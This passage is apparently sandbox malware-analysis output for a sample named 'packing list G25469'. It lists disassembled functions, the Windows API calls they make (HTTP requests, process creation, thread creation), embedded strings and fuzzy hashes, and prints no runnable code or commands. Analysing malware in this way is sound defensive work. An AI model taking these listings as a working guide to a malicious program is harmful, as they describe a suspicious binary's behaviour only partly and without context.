                                                  • Opcode Fuzzy Hash: 307af6357ca606a16d0d8e28098fdce65adaceeb2dbbb06b276b14623bb8a1c9
                                                  • Instruction Fuzzy Hash: AC917C31A00646AACB18DFA4C481BEAFFF5FF04300F5085A9E899A7151DF35B959DBE0
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B330DC
                                                  • CoUninitialize.OLE32(?,00000000), ref: 00B33181
                                                  • UnregisterHotKey.USER32(?), ref: 00B332A9
                                                  • DestroyWindow.USER32(?), ref: 00BA5079
                                                  • FreeLibrary.KERNEL32(?), ref: 00BA50F8
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BA5125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: a6bd119d7f9932a74d4d7247a138c902f358a83e25ae3480951310ea597bbe0f
                                                  • Instruction ID: 59f45ad11d54bd1aaafaed13a4ed3d8ceb04eec46a8cd8b8431dec60d60b1f86
                                                  • Opcode Fuzzy Hash: a6bd119d7f9932a74d4d7247a138c902f358a83e25ae3480951310ea597bbe0f
                                                  • Instruction Fuzzy Hash: 079118746002029FC719EF24C895B6AF3E4FF15704F6482E9E50AA7262DF34AE5ACF54
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00B4CC15
                                                    • Part of subcall function 00B4CCCD: GetClientRect.USER32(?,?), ref: 00B4CCF6
                                                    • Part of subcall function 00B4CCCD: GetWindowRect.USER32(?,?), ref: 00B4CD37
                                                    • Part of subcall function 00B4CCCD: ScreenToClient.USER32(?,?), ref: 00B4CD5F
                                                  • GetDC.USER32 ref: 00BAD137
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BAD14A
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BAD158
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BAD16D
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BAD175
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BAD200
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: fdc948dcf7b3f54a40c9eaa1f65374ca7bdd4d72d1549cea915c9c2d77259065
                                                  • Instruction ID: 86432185f6bdfe3cdd83da68195b88491bd9823a0670dab6a87e23bfd29f6aac
                                                  • Opcode Fuzzy Hash: fdc948dcf7b3f54a40c9eaa1f65374ca7bdd4d72d1549cea915c9c2d77259065
                                                  • Instruction Fuzzy Hash: 7B71D130404209EFCF21DF64C881ABA7BF5FF4A314F1446A9ED56AB6A6DB318941EF50
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                    • Part of subcall function 00B4B63C: GetCursorPos.USER32(000000FF), ref: 00B4B64F
                                                    • Part of subcall function 00B4B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B4B66C
                                                    • Part of subcall function 00B4B63C: GetAsyncKeyState.USER32(00000001), ref: 00B4B691
                                                    • Part of subcall function 00B4B63C: GetAsyncKeyState.USER32(00000002), ref: 00B4B69F
                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00B9ED3C
                                                  • ImageList_EndDrag.COMCTL32 ref: 00B9ED42
                                                  • ReleaseCapture.USER32 ref: 00B9ED48
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00B9EDF0
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B9EE03
                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00B9EEDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 1924731296-2107944366
                                                  • Opcode ID: 920d3b60e325df704a2eb30940b584226f221fbabe6b8598f6910986e67b37fc
                                                  • Instruction ID: a196be80d8b648682361c8e988d309a33d0aed820429933bd6f6cb295ade5f6d
                                                  • Opcode Fuzzy Hash: 920d3b60e325df704a2eb30940b584226f221fbabe6b8598f6910986e67b37fc
                                                  • Instruction Fuzzy Hash: 35518970204304AFDB10EF24DC96F6A77E4EB88714F504A6DF595972E2DB70E904CB52
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B845FF
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B8462B
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B8466D
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B84682
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B8468F
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B846BF
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B84706
                                                    • Part of subcall function 00B85052: GetLastError.KERNEL32(?,?,00B843CC,00000000,00000000,00000001), ref: 00B85067
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 1241431887-3916222277
                                                  • Opcode ID: 2294721b0443c7ed3610f81897ac23724d663eb6fa2fec2be1d702d1e4267560
                                                  • Instruction ID: 83c3dc284749d35afecfdf4a729880ecd78ae0ccb2446f75c34206b23d73f684
                                                  • Opcode Fuzzy Hash: 2294721b0443c7ed3610f81897ac23724d663eb6fa2fec2be1d702d1e4267560
                                                  • Instruction Fuzzy Hash: A6416DB1501206BFEB16AF50CC85FEA77ECEF09304F104196FA059A161EBB49D44CBA4
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BCDC00), ref: 00B8B715
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BCDC00), ref: 00B8B749
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B8B8C1
                                                  • SysFreeString.OLEAUT32(?), ref: 00B8B8EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 1e1548a406bf81719e7d4712eb5c430e66eaea940dc41705c02984847e051a75
                                                  • Instruction ID: b7e83f72c4e29e406c19d7b3af1108d97e494991017724af8f8d0fd53c805233
                                                  • Opcode Fuzzy Hash: 1e1548a406bf81719e7d4712eb5c430e66eaea940dc41705c02984847e051a75
                                                  • Instruction Fuzzy Hash: C7F14D75A00209EFCF04EFA4C884EAEB7B9FF49315F108599F915AB260DB71AE45CB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B924F5
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B92688
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B926AC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B926EC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B9270E
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9286F
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B928A1
                                                  • CloseHandle.KERNEL32(?), ref: 00B928D0
                                                  • CloseHandle.KERNEL32(?), ref: 00B92947
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 5c5da910dc44e1d7574b1e70c093dde882b2a03d9c4e5ab9ea370c38827e12b4
                                                  • Instruction ID: a4386cc66f3d6a8f991d30dcceb99106fe67f6a438fe47bbc2ea0ca73b28103b
                                                  • Opcode Fuzzy Hash: 5c5da910dc44e1d7574b1e70c093dde882b2a03d9c4e5ab9ea370c38827e12b4
                                                  • Instruction Fuzzy Hash: DCD19135A04201EFCB14EF24C891B6EBBE5EF85310F1485ADF8999B2A2DB31DD45CB52
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B9B3F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: f7a343f7076ee4922b323c96478b0028f0015f3e26d8faea9ed313e203743b16
                                                  • Instruction ID: eb6e259227e77bbc5487f7d7507f7f890f902012ea37ab47b1a00395be365551
                                                  • Opcode Fuzzy Hash: f7a343f7076ee4922b323c96478b0028f0015f3e26d8faea9ed313e203743b16
                                                  • Instruction Fuzzy Hash: 6651AE30604204BBEF209F29AE95FA93BE4EB04314F2445B5F619D72E2DBB1E9409B54
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BADB1B
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BADB3C
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BADB51
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BADB6E
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BADB95
                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B4A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BADBA0
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BADBBD
                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B4A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BADBC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                  • String ID:
                                                  • API String ID: 1268354404-0
                                                  • Opcode ID: ed501f5841d344d564398730f9f2c50bc01ba55dbc28d59213eafc1361dac538
                                                  • Instruction ID: ed035b9c47258b80eac3044e86932d859a72b60a4c736b9211b3164df702c75d
                                                  • Opcode Fuzzy Hash: ed501f5841d344d564398730f9f2c50bc01ba55dbc28d59213eafc1361dac538
                                                  • Instruction Fuzzy Hash: A0517B70644209EFDB24DF69CC81FAA77F4EB18750F110668F94697690DBB0AE80EB60
                                                  APIs
                                                    • Part of subcall function 00B76EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B75FA6,?), ref: 00B76ED8
                                                    • Part of subcall function 00B76EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B75FA6,?), ref: 00B76EF1
                                                    • Part of subcall function 00B772CB: GetFileAttributesW.KERNEL32(?,00B76019), ref: 00B772CC
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B775CA
                                                  • _wcscmp.LIBCMT ref: 00B775E2
                                                  • MoveFileW.KERNEL32(?,?), ref: 00B775FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: fa7d7a2d79d56d689fe8022fbea24670f5e94686e79cf8b5b4f075a5f490a0cc
                                                  • Instruction ID: 5ebb12bd4ad001cbbf7f7f21f96f1cc980593eba649eaddce6be20354a008a48
                                                  • Opcode Fuzzy Hash: fa7d7a2d79d56d689fe8022fbea24670f5e94686e79cf8b5b4f075a5f490a0cc
                                                  • Instruction Fuzzy Hash: 97513FB2A492199ADF50EB94D881DDE73FCDF08310B1045EAFA19E3141EA74D6C9CB60
                                                  APIs
                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BADAD1,00000004,00000000,00000000), ref: 00B4EAEB
                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00BADAD1,00000004,00000000,00000000), ref: 00B4EB32
                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00BADAD1,00000004,00000000,00000000), ref: 00BADC86
                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BADAD1,00000004,00000000,00000000), ref: 00BADCF2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: b8d8a7722488a901c54fdec577aca6823e3f007d71f37f200447f526501d61a8
                                                  • Instruction ID: 85b9ed9a6e464c99bf55b8145f5d5dbaf4a473f7504e51fd7ccead84fe47ce7d
                                                  • Opcode Fuzzy Hash: b8d8a7722488a901c54fdec577aca6823e3f007d71f37f200447f526501d61a8
                                                  • Instruction Fuzzy Hash: 3541F870608680EBD7394B288DCDB7A7AD5FB42314F5948CDF0A783961EAB4FA40E711
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B26C
                                                  • HeapAlloc.KERNEL32(00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B273
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B6AEF1,00000B00,?,?), ref: 00B6B288
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B290
                                                  • DuplicateHandle.KERNEL32(00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B293
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B6AEF1,00000B00,?,?), ref: 00B6B2A3
                                                  • GetCurrentProcess.KERNEL32(00B6AEF1,00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B2AB
                                                  • DuplicateHandle.KERNEL32(00000000,?,00B6AEF1,00000B00,?,?), ref: 00B6B2AE
                                                  • CreateThread.KERNEL32(00000000,00000000,00B6B2D4,00000000,00000000,00000000), ref: 00B6B2C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 9b5240650b3ce46f41389b17e40f232bbf43896148deed8482b77ba51e2c4381
                                                  • Instruction ID: ce3ab46b7e54556f822c10d28cad5717e2c28d5741826dd390055f7175500c4b
                                                  • Opcode Fuzzy Hash: 9b5240650b3ce46f41389b17e40f232bbf43896148deed8482b77ba51e2c4381
                                                  • Instruction Fuzzy Hash: 0F01B6B5240308BFE710AFA5DC49F6B7BACEB88711F018511FA05DB1A1DAB89800CB65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: 1c7085935fc91bc977eeaa05a71d50f163ce2c56bef25cdc0c942990b2332ab4
                                                  • Instruction ID: b890b7cc6479089ca6ad469aaa8ec8ff9db8814aebfdf7a4eeea7c72a106e501
                                                  • Opcode Fuzzy Hash: 1c7085935fc91bc977eeaa05a71d50f163ce2c56bef25cdc0c942990b2332ab4
                                                  • Instruction Fuzzy Hash: 18E1B6B5A00219AFDF14EFA4D885AEE7BF5EF48314F1480A9F905A7291D770ED41CBA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 4800d6afa6fad5e65803c143287bae6f13a9dcbedbd01cbdf73cca6bd6733200
                                                  • Instruction ID: f1aff36ed2e019f07d06e5abb419f71e2e9136a61123f34bc725a90d0fa5b36b
                                                  • Opcode Fuzzy Hash: 4800d6afa6fad5e65803c143287bae6f13a9dcbedbd01cbdf73cca6bd6733200
                                                  • Instruction Fuzzy Hash: CC918271A00215BBDF24EFA5C884FAEB7F8EF45710F1085A9F515AB2A1DB709944CFA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memset
                                                  • String ID: Q\E$[$\$\$]$^
                                                  • API String ID: 2102423945-1026548749
                                                  • Opcode ID: 8ab58957e474a48d5cbb2787c18678452443966f3eb8689a32ee678f3e4e6f69
                                                  • Instruction ID: 61a0b13ff83464c50e10176015c38d3932ddee15500f9029e9a122e9ebb4661d
                                                  • Opcode Fuzzy Hash: 8ab58957e474a48d5cbb2787c18678452443966f3eb8689a32ee678f3e4e6f69
                                                  • Instruction Fuzzy Hash: F4516CB1D042599BCF24CF98C8816EEB7F6FF99314F3481AAE814A7251E7309D858B81
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B99B19
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B99B2D
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B99B47
                                                  • _wcscat.LIBCMT ref: 00B99BA2
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B99BB9
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B99BE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
